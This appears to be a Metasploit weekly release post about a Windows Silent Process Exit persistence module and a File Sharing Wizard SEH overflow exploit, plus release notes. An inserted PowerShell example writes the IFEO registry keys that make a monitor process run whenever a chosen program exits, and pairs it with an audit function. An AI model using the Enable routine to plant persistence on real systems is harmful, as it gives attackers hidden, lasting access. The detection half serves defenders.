Exploiting Windows tools

There are two new Windows modules this week, both brought to you by the Metasploit team.

The Windows Silent Process Exit Persistence module, from our own bwatters-r7, abuses the Silent Process Exit monitoring feature of Image File Execution Options (IFEO), which lets Windows launch a designated monitor process whenever a specified process exits. With administrative privileges, an attacker can register a monitor for a chosen binary and then use the module to upload a payload that runs every time that binary exits.
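As an added illustration (not code from the module or from this post), the PowerShell below configures a Silent Process Exit monitor the way the Windows feature is documented and then audits a host for monitors that will actually fire, which is the check a defender wants after reading the above. The registry paths, value names and the 0x200 flag are the documented Windows ones; the function names and the placeholder target and monitor paths (calc.exe, C:\Temp\monitor.exe) are my own assumptions.

```powershell
# Added example, not part of the Metasploit module or the blog post.
# Windows launches the executable named in MonitorProcess whenever the named
# process exits, provided the matching IFEO key has the
# FLG_MONITOR_SILENT_PROCESS_EXIT (0x200) bit set in GlobalFlag.
$ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$speRoot  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit'
$FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200

# Attacker/administrator side: both halves must be written, or nothing runs.
# Requires an elevated prompt because the keys live under HKLM.
function Enable-SilentProcessExitMonitor {
    param(
        [Parameter(Mandatory)][string]$TargetProcess,   # placeholder, e.g. 'calc.exe'
        [Parameter(Mandatory)][string]$MonitorCommand   # placeholder, e.g. 'C:\Temp\monitor.exe'
    )
    $ifeoKey = Join-Path $ifeoRoot $TargetProcess
    $speKey  = Join-Path $speRoot  $TargetProcess

    foreach ($k in $ifeoKey, $speKey) {
        if (-not (Test-Path -LiteralPath $k)) { New-Item -Path $k -Force | Out-Null }
    }

    # OR the bit in rather than overwrite, so any existing GlobalFlag bits survive.
    $current = [int]((Get-ItemProperty -LiteralPath $ifeoKey -ErrorAction SilentlyContinue).GlobalFlag)
    $flags   = $current -bor $FLG_MONITOR_SILENT_PROCESS_EXIT
    Set-ItemProperty -LiteralPath $ifeoKey -Name GlobalFlag -Value $flags -Type DWord

    # ReportingMode 1 = launch the monitor process; MonitorProcess is the command line to run.
    Set-ItemProperty -LiteralPath $speKey -Name ReportingMode  -Value 1 -Type DWord
    Set-ItemProperty -LiteralPath $speKey -Name MonitorProcess -Value $MonitorCommand -Type String
}

# Defender side: enumerate every configured monitor and say whether it is live.
function Get-SilentProcessExitMonitor {
    [CmdletBinding()]
    param()

    if (-not (Test-Path -LiteralPath $speRoot)) {
        Write-Verbose 'No SilentProcessExit key present; nothing configured.'
        return
    }

    foreach ($key in Get-ChildItem -LiteralPath $speRoot) {
        $target = $key.PSChildName
        $spe    = Get-ItemProperty -LiteralPath $key.PSPath

        # A SilentProcessExit entry alone is inert; the IFEO GlobalFlag bit arms it.
        $ifeo       = Get-ItemProperty -LiteralPath (Join-Path $ifeoRoot $target) -ErrorAction SilentlyContinue
        $globalFlag = [int]$ifeo.GlobalFlag
        $armed      = ($globalFlag -band $FLG_MONITOR_SILENT_PROCESS_EXIT) -ne 0

        [pscustomobject]@{
            TargetProcess  = $target
            MonitorProcess = $spe.MonitorProcess
            ReportingMode  = $spe.ReportingMode
            GlobalFlag     = ('0x{0:X}' -f $globalFlag)
            MonitorActive  = $armed
        }
    }
}

# Usage (placeholder paths; the Enable call is left commented because it writes to HKLM):
# Enable-SilentProcessExitMonitor -TargetProcess 'calc.exe' -MonitorCommand 'C:\Temp\monitor.exe'
Get-SilentProcessExitMonitor | Where-Object MonitorActive | Format-Table -AutoSize
```

The audit reports only entries where both the SilentProcessExit key and the IFEO GlobalFlag bit are present, since that pairing is what makes the monitor launch; an unexpected MonitorProcess pointing at a user-writable path is the thing to investigate.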

The File Sharing Wizard - POST SEH Overflow module, contributed by our own dwelch-r7, exploits a vulnerability in the Windows File Sharing Wizard application. A crafted, unauthenticated HTTP POST request overflows a stack buffer and overwrites a Structured Exception Handler (SEH) record, allowing a remote attacker to obtain arbitrary code execution on vulnerable Windows targets.

Untitled Goose Banner

A contribution by 0xGilda addresses a glaring omission from msfconsole, which is its lack of Untitled Goose Game homages. A new goose banner has been added, which you can now see on startup. HONK!

                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<
                  `.`.<
                    `-'

       =[ metasploit v5.0.54-dev-82c77a4ec8               ]
+ -- --=[ 1931 exploits - 1079 auxiliary - 332 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > 

New modules (2)

Enhancements and features

  • PR #12398 by nsa adds documentation for the auxiliary/scanner/ssh/ssh_version module.
  • PR #12368 by h00die adds documentation for the auxiliary/server/capture/smb module.
  • PR #12396 by bwatters-r7 updates metasploit-payloads to version 1.3.78, which adds support for key event management in Java payloads.
  • PR #12388 by zeroSteiner adds metadata to the SMB client library so that the framework can detect whether the target host requires SMB signing on incoming connections.

Bugs fixed

  • PR #12432 by busterb fixes a false negative bug in the BlueKeep scanner by checking the length of the result from an rdp_recv call in the RDP library.
  • PR #12404 by bcoles fixes a bug with the shell session handler that resulted in unexpected deletion of directories when the path contained a space.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

We recently announced the release of Metasploit 5. You can get it by cloning
the Metasploit Framework repo (master branch). To install fresh without using git,
you can use the open-source-only Nightly Installers or the binary installers
(which also include the commercial editions).